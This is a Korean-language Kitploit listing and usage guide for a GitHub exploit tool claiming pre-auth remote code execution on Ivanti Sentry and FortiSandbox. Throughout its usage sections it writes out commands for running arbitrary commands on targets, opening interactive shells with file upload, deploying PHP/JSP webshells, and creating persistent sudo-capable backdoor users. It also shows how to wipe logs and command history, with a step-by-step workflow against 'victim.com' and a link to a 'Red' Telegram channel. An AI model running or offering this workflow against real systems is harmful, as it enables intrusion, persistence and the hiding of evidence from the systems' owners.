Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-5027-Langflow — Multi-CVE exploit tool for pre-auth remote code execution on Ivanti Sentry and FortiSandbox. Features interactive shell, webshell deployment, backdoor user creation, and log cleaning for penetration testing. | Kitploit
도구/GitHubGitHub/layer-6/cve-2026-5027-langflow
Privilege EscalationPersistence MechanismsVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Remote Access Tool
Payload Development
GitHublayer-6/cve-2026-5027-langflow

CVE-2026-5027-Langflow

Multi-CVE exploit tool for pre-auth remote code execution on Ivanti Sentry and FortiSandbox. Features interactive shell, webshell deployment, backdoor user creation, and log cleaning for penetration testing.

저장소 보기
2개월 전아직 검토되지 않음

(CVE-2026-5027) 및 (CVE-2026-10520) (CVE-2026-25089) 익스플로이터:

클론

root@kitploit:~
git clone https://github.com/Layer-6/CVE-2026-5027-Langflow.git
cd CVE-2026-5027-Langflow

사용법 (exploit.py) 파일

자동 테스트 및 익스플로잇.

root@kitploit:~
python3 exploit.py -u https://target.com

CLI 사용자 설정

쉘이 폴더 안에 있을 때 자신의 웹쉘 사용:

root@kitploit:~
python3 exploit.py -u https://target.com --shell 

(📁shells/my-shell.php)

쉘이 도구 폴더에 있거나 폴더 없이 터미널 안에 있을 때:

root@kitploit:~
python3 exploit.py -u https://target.com --shell my-shell.php

웹쉘은 (PHP, Python (CGI), Perl, Ruby, ASPX)가 가능합니다.

--t로 타임아웃을 설정하고 --p로 폴더 및 파일에서 페이로드 또는 사용자 지정 경로를 로드/사용할 수 있습니다:

root@kitploit:~
python3 exploit.py -u https://target.com | -t 58 | |-p payloads.txt | | --upload-paths Dirs.txt |

예시:

root@kitploit:~
python3 exploit.py -u https://target.com --shell shells/myshell.php -t 58 -p payloads.txt --upload-paths dirs.txt

사용법 (exploitt.py) 파일

다음 CVE를 위해 설계됨:

· CVE-2026-10520 (CVSS 10.0)

· CVE-2026-25089 (CVSS 9.1)

인증 전 원격 코드 실행

자격 증명이 필요하지 않습니다.

📖 사용법

빠른 시작 - 대화형 메뉴 (인수 없음)

root@kitploit:~
python3 exploitt.py

그런 다음 프롬프트를 따릅니다:

1. 대상 유형 선택 (Ivanti 또는 Forti)

2. 대상 URL 입력 (예: https://192.168.1.100:8443)

3. 타임아웃, 프록시, 디버그 모드 설정

4. 작업 선택 (명령, 셸, 웹쉘 등)

명령줄 (고급)

1. Ivanti Sentry (CVE-2026-10520)

root@kitploit:~
# 취약한지 확인
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -c "id"

# 대화형 셸
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -s

# JSP 웹쉘 배포 (Tomcat)
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -w

# 백도어 사용자 생성 + 로그 정리
python3 exploitt.py -u https://ivanti.example.com:8443 --type ivanti -p --clean
  1. FortiSandbox (CVE-2026-25089)
root@kitploit:~
# 단일 명령
python3 exploitt.py -u https://forti.example.com --type forti -c "whoami"

# 파일 업로드 기능이 있는 대화형 셸
python3 exploitt.py -u https://forti.example.com --type forti -s
# 셸 내부: upload /path/local.txt /remote/path.txt

# PHP 웹쉘 배포
python3 exploitt.py -u https://forti.example.com --type forti -w

# 전체 자동 익스플로잇 (확인, 셸, 웹쉘, 지속성, 정리)
python3 exploitt.py -u https://forti.example.com --type forti -s -w -p --clean
  1. 자동 감지 (스크립트가 서비스를 추측)
root@kitploit:~
python3 exploitt.py -u https://target.example.com -c "id"
  1. 프록시 및 디버그 사용
root@kitploit:~
python3 exploitt.py -u https://target:8443 --proxy http://127.0.0.1:8080 --debug -c "uname -a"

사용 가능한 명령줄 인수 Argument Description -u, --url 대상 URL (예: https://192.168.1.100:8443) --type 서비스 강제: ivanti 또는 forti (선택 사항, 자동 감지) -t, --timeout 요청 타임아웃 (초 단위, 기본값 30) --proxy HTTP/HTTPS 프록시 (예: http://127.0.0.1:8080) -d, --debug 디버그 출력 활성화 --ua 사용자 정의 User‑Agent 문자열 -c, --cmd 단일 명령을 실행하고 종료 -s, --shell 대화형 셸 실행 -w, --webshell 웹쉘 배포 (Forti의 경우 PHP, Ivanti의 경우 JSP) -p, --persist 지속적인 sudo 가능 백도어 사용자 생성 --clean 익스플로잇 후 로그 및 명령 기록 삭제

대화형 셸 명령

Command Example Description normal command id 모든 시스템 명령 실행 upload upload exploit.sh /tmp/backdoor.sh 로컬 파일을 원격 호스트에 업로드 exit exit 셸 종료

웹쉘 배포 세부정보

· Ivanti Sentry – Tomcat webapps 내에 .jsp 셸 배포 (/usr/local/tomcat/webapps/ROOT/) · 접근: https://target/shell_random.jsp?cmd=whoami · FortiSandbox – 웹 루트 내에 .php 셸 배포 (/var/www/html/) · 접근: https://target/shell_random.php?cmd=whoami

예제 워크플로 (전체 침투 테스트)

root@kitploit:~
# 1. 탐지 및 익스플로잇
python3 exploitt.py -u https://victim.com:8443 --type ivanti -s

# 2. 셸 내부에서 권한 확인
id

# 3. 지속성을 위해 웹쉘 배포
python3 exploitt.py -u https://victim.com:8443 --type ivanti -w

# 4. 백도어 사용자 생성
python3 exploitt.py -u https://victim.com:8443 --type ivanti -p

# 5. 로그 정리
python3 exploitt.py -u https://victim.com:8443 --type ivanti --clean

Red Telegram 채널:

https://t.me/Red_Rooted_Ghost

도구 다운로드